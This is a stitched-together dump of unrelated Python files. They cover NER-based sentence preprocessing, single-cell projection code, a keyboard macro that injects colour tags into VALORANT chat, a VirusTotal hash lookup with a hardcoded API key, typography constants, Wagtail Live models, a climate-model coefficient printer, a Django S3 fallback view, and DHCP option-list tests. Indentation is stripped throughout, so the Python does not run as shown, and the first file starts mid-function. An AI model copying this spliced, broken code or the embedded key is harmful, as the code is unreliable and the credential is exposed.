key = str(ent.start) + ':' + str(ent.end - 1)
ner_dict[key] = ent.label_
return ner_dict
def convert_indexes_to_int(e_idx):
new_e_idx = []
for indexes in e_idx:
t = (int(indexes[0]), int(indexes[1]))
new_e_idx.append(t)
return new_e_idx
def replace_ner(row, nlp, check_ner_overlap=False): # similar to concept_replace, with some caveats
sentence = row.tokenized_sentence.split()
e1_indexes = row.metadata['e1']['word_index']
e2_indexes = row.metadata['e2']['word_index']
e1_indexes = convert_indexes_to_int(e1_indexes)
e2_indexes = convert_indexes_to_int(e2_indexes)
only_e1_indexes, only_e2_indexes, common_indexes = \
get_common_and_separate_entities(e1_indexes, e2_indexes)
ner_dict = get_ner_dict(sentence, nlp)
if check_ner_overlap and check_for_overlap(ner_dict):
print("There is overlap", ner_dict) # only need to check this once
#Below code works only if there isn't overlap within ner_dict, so make sure that there isn't overlap
# overlaps between ner label and e1 and e2 indexes are a problem
# And they can be of two types
# Type 1: NER overlaps with e1 or e2 in the beginning or end
# Here we want to keep the NER link the same but extend e1 or e2 index to the beginning or end of the
# NER
#Type 2: NER is inside of the entity completely: At this point it should be simply ok to mention at what
# token to insert ENTITYstart and ENTITYend
# Type 1 is a problem, but Type 2 is easy to handle while the new sentence is being created
only_e1_indexes = correct_entity_indexes_with_ner(ner_dict, only_e1_indexes)
only_e2_indexes = correct_entity_indexes_with_ner(ner_dict, only_e2_indexes)
common_indexes = correct_entity_indexes_with_ner(ner_dict, common_indexes)
# below needs to be done in case there was again a shift that might have caused both e1 and e2 to have
# the same spans
only_e1_indexes, only_e2_indexes, common_indexes2 = \
get_common_and_separate_entities(only_e1_indexes, only_e2_indexes)
common_indexes.extend(common_indexes2)
ner_repl_dict = get_ner_replacement_dictionary(only_e1_indexes, only_e2_indexes, common_indexes,
ner_dict)
sorted_positions = ner_sort_position_keys(ner_repl_dict)
new_sentence = '' # this below part is buggy, shouldn't be too bad to fix
for i in range(len(sorted_positions)):
curr_pos = sorted_positions[i]
curr_start_pos, curr_end_pos = parse_position(curr_pos)
curr_dict = ner_repl_dict[curr_pos]
start_insert = '' if curr_dict['insert'] is None else curr_dict['insert'].upper()
between_replace = '' if curr_dict['replace_by'] is None else curr_dict['replace_by']
if i == 0:
new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_insert + ' ' + \
between_replace + ' '
else:
prev_pos = sorted_positions[i-1]
_, prev_end_pos = parse_position(prev_pos)
if ner_repl_dict[prev_pos]['insert'] is None: # means middle will be starting from prev_pos + 1
middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos])
else: # means middle needs to start from the prev_pos
middle = list_to_string(sentence[prev_end_pos: curr_start_pos])
if middle == '':
middle = ' '
new_sentence += middle + ' ' + start_insert + ' ' + between_replace + ' '
if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
position = curr_end_pos + 1 if curr_dict['insert'] is None else curr_end_pos
new_sentence += ' ' + list_to_string(sentence[position:])
new_sentence = remove_whitespace(new_sentence)
return new_sentence
'''
Below methods do entity detection from the tagged sentences, i.e. a sentence that contains
ESTART, EEND etc, use that to detect the locations of the respective entities and remove the tags
from the sentence to return something clean
'''
# below is taken directly from the ddi converter and
# removes the first occurence of the start and end, and tells of their location
def get_entity_start_and_end(entity_start, entity_end, tokens):
e_start = tokens.index(entity_start)
e_end = tokens.index(entity_end) - 2 # 2 tags will be eliminated
between_tags = 0
for index in range(e_start + 1, e_end + 2):
# we want to check between the start and end for occurence of other tags
if tokens[index].endswith('START') or tokens[index].endswith('END'):
between_tags += 1
e_end -= between_tags
# only eliminate the first occurence of the entity_start and entity_end
new_tokens = []
entity_start_seen = 0
entity_end_seen = 0
for x in tokens:
if x == entity_start:
entity_start_seen += 1
if x == entity_end:
entity_end_seen += 1
if x == entity_start and entity_start_seen == 1:
continue
if x == entity_end and entity_end_seen == 1:
continue
new_tokens.append(x)
return (e_start, e_end), new_tokens
# based upon the method in converter for DDI, this will do removal of the entity tags and keep
# track of where they are located in the sentence
def get_entity_positions_and_replacement_sentence(tokens):
e1_idx = []
e2_idx = []
tokens_for_indexing = tokens
for token in tokens:
if token.endswith('START'):
ending_token = token[:-5] + 'END'
e_idx, tokens_for_indexing = get_entity_start_and_end(token, ending_token, tokens_for_indexing)
if token == entity1 + 'START' or token == entity_either + 'START':
e1_idx.append(e_idx)
if token == entity2 + 'START' or token == entity_either + 'START':
e2_idx.append(e_idx)
return e1_idx, e2_idx, tokens_for_indexing
#TODO unify the preprocessing code with actually writing to a dataframe so that experiments can be started
# Read the original dataframe, generate the replacement sentence and then from that, you should just
# call the get_entity_positions_and_replacement_sentence
# might be good to just have one method to do this because it seems like the tasks are kinda similar
# just different methods to call for preprocessing 1 vs 2
'''
Returns the dataframe after doing the preprocessing
'''
# update the metadata and the sentence with the preprocessed version
def update_metadata_sentence(row):
tagged_sentence = row.tagged_sentence
e1_idx, e2_idx, tokens_for_indexing = get_entity_positions_and_replacement_sentence(tagged_sentence.split())
new_sentence = list_to_string(tokens_for_indexing)
metadata = row.metadata
metadata['e1']['word_index'] = e1_idx
metadata['e2']['word_index'] = e2_idx
metadata.pop('entity_replacement', None) # remove the entity replacement dictionary from metadata
row.tokenized_sentence = new_sentence
row.metadata = metadata
return row
# give this preprocessing function a method to read the dataframe, and the location of the original
# dataframe to read so that it can do the preprocessing
# whether to do type 1 vs type 2 of the preprocessing
# 1: replace with all concepts in the sentence, 2: replace the stop words, punctuations and digits
# 3: replace only punctuations and digits
def preprocess(read_dataframe, df_directory, nlp, type_to_do=1):
df = read_dataframe(df_directory)
if type_to_do == 1:
df['tagged_sentence'] = df.apply(replace_with_concept, axis=1) # along the column axis
elif type_to_do == 2:
df['tagged_sentence'] = df.apply(replace_digit_punctuation_stop_word, args=(True,), axis=1)
elif type_to_do == 3:
df['tagged_sentence'] = df.apply(replace_digit_punctuation_stop_word, args=(False,), axis=1)
elif type_to_do == 4:
df['tagged_sentence'] = df.apply(replace_ner, args=(nlp, False), axis=1)
df = df.apply(update_metadata_sentence, axis=1)
#df = df.rename({'tokenized_sentence': 'preprocessed_sentence'}, axis=1)
df = df.drop(['tagged_sentence'], axis=1)
return df
| 24,681 | 7,763 |
import datetime
import seaborn as sns
import pickle as pickle
from scipy.spatial.distance import cdist, pdist, squareform
import pandas as pd
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
#from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import random
import datetime
from sklearn.decomposition import PCA
import scipy
from sklearn.metrics import pairwise_distances
from scipy.sparse import issparse, coo_matrix
import sys
def prediction(mwanted_order, mclasses_names, mprotogruop,
mdf_train_set,mtrain_index,mreorder_ix,
mcolor_dict,net,learninggroup="train"):
#mwanted_order = mwanted_order, mclasses_names = mclasses_names, mprotogruop = dfpfcclus.loc["Cluster"].values,
#mdf_train_set = mdf_train_set, figsizeV = 18, mtrain_index = mtrain_index, net = net, mreorder_ix = mreorder_ix,
#mcolor_dict = refcolor_dict, learninggroup = "test"
if learninggroup=="train":
mreorder_ix = [list(mclasses_names).index(i) for i in mwanted_order]
mbool00 = np.in1d( mclasses_names[mtrain_index], mwanted_order )
if sum(mcolor_dict.index.isin(mwanted_order))!=len(mwanted_order):
mcolor_dict={}
for item in mwanted_order:
mcolor_dict[item]=random.sample(range(0, 255), 3)
mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
#mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
#rcParams['savefig.dpi'] = 500
#mnewcolors = array(list(mcolor_dict[mprotogruop].values))
normalizer = 0.9*mdf_train_set.values.max(1)[:,np.newaxis]
refdataLR=net.predict_proba((mdf_train_set.values/ normalizer).T)
todaytime=f"{datetime.datetime.now():%Y%m%d%I%M%p}"
dataRef= refdataLR[:,mreorder_ix]
mreordername=[]
for i in mreorder_ix:
mreordername.append(list(mclasses_names)[i])
dfprobCL=pd.DataFrame(dataRef*100, index=mdf_train_set.columns,columns=mreordername)
#dfnewcl=pd.DataFrame(array([xtest,ytest]).T, index=mdf_train_set.columns)
return mreordername, dfprobCL, mcolor_dict, refdataLR, mreorder_ix
elif learninggroup=="test":
#mreorder_ix = [list(mwanted_order).index(i) for i in mwanted_order]
if sum(mcolor_dict.index.isin(mwanted_order))!=len(mwanted_order):
mcolor_dict={}
for item in mwanted_order:
mcolor_dict[item]=random.sample(range(0, 255), 3)
mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
#mnewcolors = array(list(mcolor_dict[mprotogruop].values))
normalizerTest=mdf_train_set.max(1)-mdf_train_set.min(1)
normalizedValue=(mdf_train_set.sub(mdf_train_set.min(1),0).div(normalizerTest,0).fillna(0).values).T
dataRef=net.predict_proba( normalizedValue)
mreordername=[]
for i in mreorder_ix:
mreordername.append(list(mclasses_names)[i])
dfprobCL=pd.DataFrame(dataRef*100, index=mdf_train_set.columns,columns=mreordername)
#dfnewcl=pd.DataFrame(array([xtest,ytest]).T, index=mdf_train_set.columns)
return mreordername, dfprobCL, mcolor_dict, dataRef
def permutationTest(mdf_train_set,net, dfprobRef,mreorder_ix,num):
test = mdf_train_set.values.reshape((len(mdf_train_set.columns) * len(mdf_train_set.index)))
test = np.random.permutation(test)
test = test.reshape((len(mdf_train_set.index), len(mdf_train_set.columns)))
dftest = pd.DataFrame(test).astype(float)
xp = dftest.values
xp -= xp.min()
xp /= xp.ptp()
test0 = net.predict_proba((xp).T)[:, mreorder_ix]
for i in range(0, num):
test = mdf_train_set.values.reshape((len(mdf_train_set.columns) * len(mdf_train_set.index)))
test = np.random.permutation(test)
test = test.reshape((len(mdf_train_set.index), len(mdf_train_set.columns)))
dftest = pd.DataFrame(test).astype(float)
xp = dftest.values
xp -= xp.min()
xp /= xp.ptp()
dataRef2 = net.predict_proba((xp).T)[:, mreorder_ix]
test0 = np.append(test0, dataRef2, axis=0)
# test0=test0+dataRef2
thresholdlist = []
temp = []
for threshold in np.arange(0.0, 1.0, 0.01):
thresholdlist.append("Prob_%s%%" % int(threshold * 100))
temp.append((np.sum(test0 > threshold, axis=0) / test0.shape[0]))
ratiodf = pd.DataFrame(temp)
ratiodf.index = thresholdlist
ratiodf.columns = dfprobRef.columns
dftest0 = pd.DataFrame(test0 * 100, columns=dfprobRef.columns)
return dftest0, ratiodf
def indices_distancesDensematrix(D, n_neighbors):
sample_range = np.arange(D.shape[0])[:, None]
indices = np.argpartition(D, n_neighbors-1, axis=1)[:, :n_neighbors]
indices = indices[sample_range, np.argsort(D[sample_range, indices])]
distances = D[sample_range, indices]
return indices, distances
def sparse_matrixindicesDistances(indices, distances, n_obs, n_neighbors):
n_nonzero = n_obs * n_neighbors
indptr = np.arange(0, n_nonzero + 1, n_neighbors)
D = scipy.sparse.csr_matrix((distances.copy().ravel(), # copy the data, otherwise strange behavior here
indices.copy().ravel(),
indptr),
shape=(n_obs, n_obs))
D.eliminate_zeros()
return D
def SWAPLINE_dist(dfnn, n_neighbors, dfposi, metric = 'euclidean', n_pcs=30, TopN=30):
#n_pcs = 30, n_neighbors = len(dfnn.index), metric = 'euclidean'
X = dfnn
pca_ = PCA(n_components=n_pcs, svd_solver='arpack', random_state=0)
X_pca = pca_.fit_transform(X)
PariDistances = pairwise_distances(X_pca, metric=metric)
knn_indices, knn_distances = indices_distancesDensematrix(PariDistances, n_neighbors)
_distances = sparse_matrixindicesDistances(knn_indices, knn_distances, X_pca.shape[0], n_neighbors)
dftestdist = pd.DataFrame(knn_distances)
dftest = 0
dftestindex = pd.DataFrame(knn_indices)
# dfnn=df.T
# dfnn.shape
dftestindex.index = dfnn.index
umap1AllCluster = []
umap2AllCluster = []
clusternames = list(set(dfposi["Cluster"]))
sys.stdout.write("[%s]" % "Processing")
sys.stdout.flush()
sys.stdout.write("\b" * (50 + 1)) # return to start of line, after '['
perc = len(clusternames)
for item in clusternames:
# toolbar_width = len(clusternames)
itemindex = clusternames.index(item)
# setup toolbar
sys.stdout.write("-%s%%-" % int(itemindex*100 / perc))
sys.stdout.flush()
umap1cluster = []
umap2cluster = []
clustemp = dfposi.loc[dfposi["Cluster"] == item]["Index"]
for i in range(len(dftestindex.index)):
nearestvalue = dftestindex.iloc[i, :].loc[dftestindex.iloc[i, :].isin(clustemp)][:TopN].tolist()
umap1cluster.append(
(dfposi.iloc[nearestvalue, 1].astype(float).mean() + dfposi.iloc[nearestvalue[0], 1]) / 2)
umap2cluster.append(
(dfposi.iloc[nearestvalue, 0].astype(float).mean() + dfposi.iloc[nearestvalue[0], 0]) / 2)
umap1AllCluster.append(umap1cluster + np.random.uniform(-0.075, 0.075, size=len(umap1cluster)))
umap2AllCluster.append(umap2cluster + np.random.uniform(-0.075, 0.075, size=len(umap2cluster)))
dfcellclusumap1 = pd.DataFrame(umap1AllCluster, index=clusternames, columns=dftestindex.index).T
dfcellclusumap2 = pd.DataFrame(umap2AllCluster, index=clusternames, columns=dftestindex.index).T
sys.stdout.write("]\n")
return dfcellclusumap1, dfcellclusumap2
def SWAPLINE_assign(dfprobCL, negtest, n, dfcellclusumap1,dfcellclusumap2,nodelist):
#n= len(set(dfposi["Cluster"]))
#nodelist=[['Neural_crest', 'Neural_tube', 'Ectoderm'],['Neural_crest','Pericyte/SMC', 'VLMC'],['Neural_crest', 'Ectoderm','VLMC'],
#['Rgl','Neural_tube', 'Ectoderm'],['Rgl','Neural_tube', 'Glia'],['Rgl','Neural_tube', 'OPCs'],['Rgl','Neural_tube', 'Neuron'],
#['Rgl','OPCs', 'Neuron'],['Rgl','Glia', 'Neuron'],['Rgl','Glia', 'OPCs']]
dffinalprob = dfprobCL - negtest
dffinalprob[dffinalprob < 0] = 0
dfrank2 = dffinalprob.T
# dfrank.shape
sumlist = []
for testx in range(len(dfrank2.columns)):
dftempnn = dfprobCL.T.loc[dfrank2.nlargest(n, dfrank2.columns[testx]).iloc[:n, :].index, dfrank2.columns[testx]]
sumlist.append(np.sum(dftempnn))
dfsumnew = dfprobCL.T
dfsumnew.loc["sum_nn"] = sumlist
indexlist = dfsumnew.T.loc[dfsumnew.loc["sum_nn"] > 1].index
dfrank = dffinalprob.T
newumap1 = []
newumap2 = []
for testx in dfrank.columns:
nodeprob = []
for item in nodelist:
nodeprob.append(dfrank[testx].loc[item].sum())
nodename = nodelist[np.array(nodeprob).argmax(axis=0)]
# dftempnn=dfrank.nlargest(n,testx)[testx][:n]
dftempnn = dfrank.loc[nodename, testx]
newumap1.append(np.sum(dfcellclusumap1.loc[testx, dftempnn.index] * (dftempnn / np.sum(dftempnn))))
newumap2.append(np.sum(dfcellclusumap2.loc[testx, dftempnn.index] * (dftempnn / np.sum(dftempnn))))
dfnewumap = pd.DataFrame([newumap2, newumap1], columns=dffinalprob.index)
dfnewumap=dfnewumap.T
return dfnewumap | 9,868 | 3,812 |
# Colorful VALORANT by b0kch01
import os, ctypes
# Disable quick-edit mode (pauses bot)
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-10), 128)
from pyfiglet import Figlet
from termcolor import cprint, colored
import colorama
import keyboard
import time
# Fix legacy console color
colorama.init()
cprint("Setting up...")
cprint(" - [¤] Windows", "green")
cprint(" - [¤] Imported Modules", "green")
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
cprint(" - [x] Please run as administrator", "red")
input("[ ENTER ] to quit")
exit(0)
def clear():
os.system("cls")
# User Interface
f = Figlet(font="ogre")
bgs = ["on_red", "on_yellow", "on_green", "on_blue", "on_magenta"]
CACHED_TITLESCREEN = f"""
{ "".join([colored(" " + "COLORFUL"[i] + " ", "grey", bgs[i % 4]) for i in range(8)]) }
{ colored(f.renderText("Valorant"), "red") }
{ colored(" Created with ♥ by b0kch01! ", "grey", "on_white") }
{ colored(" USE AT YOUR OWN RISK ", "grey", "on_yellow") }
"""
i = 0
colors = [
"<enemy>",
"<team>",
"<system>",
"<notification>",
"<warning>"
]
colorMap = [
"red",
"blue",
"yellow",
"green",
"magenta"
]
def goUp():
global i
i += 1
render()
def goDown():
global i
i -= 1
render()
def makeColor():
time.sleep(0.05)
keyboard.send("home")
keyboard.write(colors[i % 5])
keyboard.send("end")
keyboard.send("backspace")
keyboard.write("</>")
keyboard.send("\n")
def render():
global i
clear()
print(CACHED_TITLESCREEN)
print("Color: " + colored(colors[i % 5], "white", "on_" + colorMap[i % 5]))
keyboard.add_hotkey("\\", makeColor)
keyboard.add_hotkey("up", goUp)
keyboard.add_hotkey("down", goDown)
try:
render()
print("Instructions are on https://github.com/b0kch01/ColorfulValorant")
print("\nEnjoy! :)")
keyboard.wait("up + down")
except KeyboardInterrupt:
exit(0) | 1,988 | 772 |
#!/usr/bin/env python
import json
import urllib
import urllib2
import sys
apikey = '843fa2012b619be746ead785b933d59820a2e357c7c186e581e8fcadbe2e550e'
def usage():
print '''Submit hash to virtus-total
(Place your VirusTotal apikey in this script)
Usage: %s <hash>''' % sys.argv[0]
exit(1)
def collect(data):
retrieve = data[0]
sha1 = retrieve['sha1']
filenames = retrieve['filenames']
first_seen = retrieve['first-seen']
last_seen = retrieve['last-seen']
last_scan_permalink = retrieve['last-scan-permalink']
last_scan_report = retrieve['last-scan-report']
return sha1, filenames, first_seen, last_seen, last_scan_permalink, last_scan_report
def msg(sha1, filenames, first_seen, last_seen, last_scan_permalink):
print '''===Suspected Malware Item===
SHA1: %s
Filenames: %s
First Seen: %s
Last Seen: %s
Link: %s''' % (sha1, filenames, first_seen, last_seen, last_scan_permalink)
def is_malware(last_scan_report):
for av, scan in last_scan_report.iteritems():
if scan[0] is not None:
return True
return False
def in_database(data, mhash):
result = data[0]['result']
if result == 0:
return False
return True
def arguments():
if len(sys.argv) < 2:
usage()
if '-h' in sys.argv[1]:
usage()
if not apikey:
print "Set apikey in %s to value of your Virus Total key" % sys.argv[0]
exit(1)
mhash = sys.argv[1]
return mhash
def query_api(mhash, apikey):
url = "http://api.vtapi.net/vtapi/get_file_infos.json"
parameters = {"resources": mhash, "apikey": apikey}
encoded = urllib.urlencode(parameters)
req = urllib2.Request(url, encoded)
response = urllib2.urlopen(req)
response_string = response.read()
data = json.loads(response_string)
return data
mhash = arguments()
data = query_api(mhash, apikey)
if not in_database(data, mhash):
print 'No entry for %s in database' % mhash
exit(1)
# Positive match found
sha1, filenames, first_seen, last_seen, last_scan_permalink, last_scan_report = collect(data)
if is_malware(last_scan_report):
msg(sha1, filenames, first_seen, last_seen, last_scan_permalink)
exit(0)
else:
print 'Entry %s is not malicious' % mhash
exit(1)
| 2,240 | 850 |
__all__ = (
'ANYSP',
'DLQUO',
'DPRIME',
'LAQUO',
'LDQUO',
'LSQUO',
'MDASH',
'MDASH_PAIR',
'MINUS',
'NBSP',
'NDASH',
'NNBSP',
'RAQUO',
'RDQUO',
'RSQUO',
'SPRIME',
'THNSP',
'TIMES',
'WHSP',
)
NBSP = '\u00A0'
NNBSP = '\u202F'
THNSP = '\u2009'
WHSP = ' '
ANYSP = r'[{}{}{}{}]'.format(WHSP, NBSP, NNBSP, THNSP)
NDASH = '–'
MDASH = '—'
MDASH_PAIR = NNBSP + MDASH + THNSP
HYPHEN = ''
MINUS = '−'
TIMES = '×'
LSQUO = '‘' # left curly quote mark
RSQUO = '’' # right curly quote mark/apostrophe
LDQUO = '“' # left curly quote marks
RDQUO = '”' # right curly quote marks
DLQUO = '„' # double low curly quote mark
LAQUO = '«' # left angle quote marks
RAQUO = '»' # right angle quote marks
SPRIME = '′'
DPRIME = '″'
| 791 | 393 |
""" Wagtail Live models."""
from django.db import models
from django.utils.timezone import now
from wagtail.admin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.core.fields import StreamField
from .blocks import LivePostBlock
class LivePageMixin(models.Model):
"""A helper class for pages using Wagtail Live.
Attributes:
channel_id (str):
Id of the corresponding channel in a messaging app.
live_posts (StreamField):
StreamField containing all the posts/messages published
respectively on this page/channel.
"""
channel_id = models.CharField(
help_text="Channel ID",
max_length=255,
blank=True,
unique=True,
)
live_posts = StreamField(
[
("live_post", LivePostBlock()),
],
blank=True,
)
panels = [
FieldPanel("channel_id"),
StreamFieldPanel("live_posts"),
]
@property
def last_update_timestamp(self):
"""Timestamp of the last update of this page."""
return self.latest_revision_created_at.timestamp()
def _get_live_post_index(self, message_id):
"""Retrieves the index of a live post.
Args:
message_id (str):
ID of the message corresponding to a live post.
Returns:
(int) Index of the live post if found else -1
"""
for i, post in enumerate(self.live_posts):
if post.value["message_id"] == message_id:
return i
return
def get_live_post_index(self, message_id):
"""Retrieves index of a livepost."""
return self._get_live_post_index(message_id=message_id)
def get_live_post_by_index(self, live_post_index):
"""Retrieves a live post by its index.
Args:
live_post_index (str): Index of the live post to look for.
Returns:
(LivePostBlock) The live post instance
Raises:
(IndexError) if a live post with the given index doesn't exist.
"""
return self.live_posts[live_post_index]
def get_live_post_by_message_id(self, message_id):
"""Retrieves a live post by its ID.
Args:
message_id (str):
ID of the message corresponding to a live post.
Returns:
(LivePostBlock) The live post instance
Raises:
(KeyError) if a live post with the given ID doesn't exist.
"""
live_post_index = self.get_live_post_index(message_id=message_id)
if live_post_index is None:
raise KeyError
return self.get_live_post_by_index(live_post_index)
def add_live_post(self, live_post):
"""Adds a new live post to live page.
Args:
live_post (LivePostBlock):
live post to add
"""
posts = self.live_posts
lp_index = 0
post_created_at = live_post["created"]
while lp_index < len(posts):
if posts[lp_index].value["created"] < post_created_at:
break
lp_index += 1
# Insert to keep posts sorted by time
self.live_posts.insert(lp_index, ("live_post", live_post))
self.save_revision().publish()
def delete_live_post(self, message_id):
"""Deletes the live post corresponding to message_id.
Args:
message_id (str):
ID of the message corresponding to a live post.
Raises:
(KeyError) if live post containing message with message_id doesn't exist.
"""
live_post_index = self.get_live_post_index(message_id=message_id)
if live_post_index is None:
raise KeyError
del self.live_posts[live_post_index]
self.save_revision().publish()
def update_live_post(self, live_post):
"""Updates a live post when it has been edited.
Args:
live_post (livePostBlock): Live post to update.
"""
live_post.value["modified"] = now()
self.save_revision().publish()
def get_updates_since(self, last_update_ts):
"""Retrieves new updates since a given timestamp value.
Args:
last_update_ts (DateTime):
Timestamp of the last update.
Returns:
(list, dict) a tuple containing the current live posts
and the updated posts since last_update_ts.
"""
current_posts, updated_posts = [], {}
for post in self.live_posts:
if not post.value["show"]:
continue
post_id = post.id
current_posts.append(post_id)
created = post.value["created"]
if created > last_update_ts: # This is a new post
updated_posts[post_id] = post.render(context={"block_id": post_id})
continue
last_modified = post.value["modified"]
if last_modified and last_modified > last_update_ts:
# This is an edited post
updated_posts[post_id] = post.render(context={"block_id": post_id})
return (updated_posts, current_posts)
class Meta:
abstract = True
| 5,259 | 1,490 |
import numpy as np
from inprod_analytic import *
from params_maooam import natm, noc
init_inprod()
real_eps = 2.2204460492503131e-16
"""This module print the coefficients computed in the inprod_analytic module"""
for i in range(0, natm):
for j in range(0, natm):
if(abs(atmos.a[i, j]) >= real_eps):
print ("a["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.a[i, j])
if(abs(atmos.c[i, j]) >= real_eps):
print ("c["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.c[i, j])
for k in range(0, natm):
if(abs(atmos.b[i, j, k]) >= real_eps):
print (
"b["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] =%.5E"
% atmos.b[i, j, k])
if(abs(atmos.g[i, j, k]) >= real_eps):
print (
"g["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% atmos.g[i, j, k])
for i in range(0, natm):
for j in range(0, noc):
if(abs(atmos.d[i, j]) >= real_eps):
print ("d["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.d[i, j])
if(abs(atmos.s[i, j]) >= real_eps):
print ("s["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.s[i, j])
for i in range(0, noc):
for j in range(0, noc):
if(abs(ocean.M[i, j]) >= real_eps):
print ("M["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.M[i, j])
if(abs(ocean.N[i, j]) >= real_eps):
print ("N["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.N[i, j])
for k in range(0, noc):
if(abs(ocean.O[i, j, k]) >= real_eps):
print (
"O["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% ocean.O[i, j, k])
if(abs(ocean.C[i, j, k]) >= real_eps):
print (
"C["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% ocean.C[i, j, k])
for j in range(0, natm):
if(abs(ocean.K[i, j]) >= real_eps):
print (
"K["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E"
% ocean.K[i, j])
if(abs(ocean.W[i, j]) >= real_eps):
print (
"W["+str(i+1)+"]" + "["+str(j+1)+"] = % .5E"
% ocean.W[i, j])
| 2,291 | 998 |
from django.http import Http404, HttpResponse
from django.shortcuts import redirect
import boto3
from botocore.errorfactory import ClientError
from ..models import PersonProxy
def fallback(request):
BUCKET_NAME = "legacy.openstates.org"
key = request.path.lstrip("/") + "index.html"
s3 = boto3.client("s3")
try:
obj = s3.get_object(Bucket=BUCKET_NAME, Key=key)
return HttpResponse(obj["Body"].read())
except ClientError:
raise Http404(request.path + "index.html")
def legislator_fallback(request, legislator_id):
try:
p = PersonProxy.objects.get(
identifiers__scheme="legacy_openstates",
identifiers__identifier=legislator_id,
)
return redirect(p.pretty_url(), permanent=True)
except PersonProxy.DoesNotExist:
return fallback(request)
| 849 | 268 |
import unittest
from dhcppython import options
class OptionListTestCases(unittest.TestCase):
def gen_optionslist(self):
return options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43])
]
)
def test_OptionsList_append1(self):
opt_list = self.gen_optionslist()
opt_list.append(options.options.short_value_to_object(1, "255.255.255.0"))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
options.options.short_value_to_object(1, "255.255.255.0")
]
)
)
def test_OptionsList_append2(self):
opt_list = self.gen_optionslist()
opt_list.append(options.options.short_value_to_object(57, 2000))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_update_by_index1(self):
opt_list = self.gen_optionslist()
opt_list[1] = options.options.short_value_to_object(57, 2000)
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_update_by_index2(self):
opt_list = self.gen_optionslist()
opt_list[0] = options.options.short_value_to_object(57, 2000)
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_update_by_index3(self):
opt_list = self.gen_optionslist()
opt_list[3] = options.options.short_value_to_object(57, 2000)
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert1(self):
opt_list = self.gen_optionslist()
opt_list.insert(1, options.options.short_value_to_object(57, 2000))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert2(self):
opt_list = self.gen_optionslist()
opt_list.insert(0, options.options.short_value_to_object(57, 2000))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert3(self):
opt_list = self.gen_optionslist()
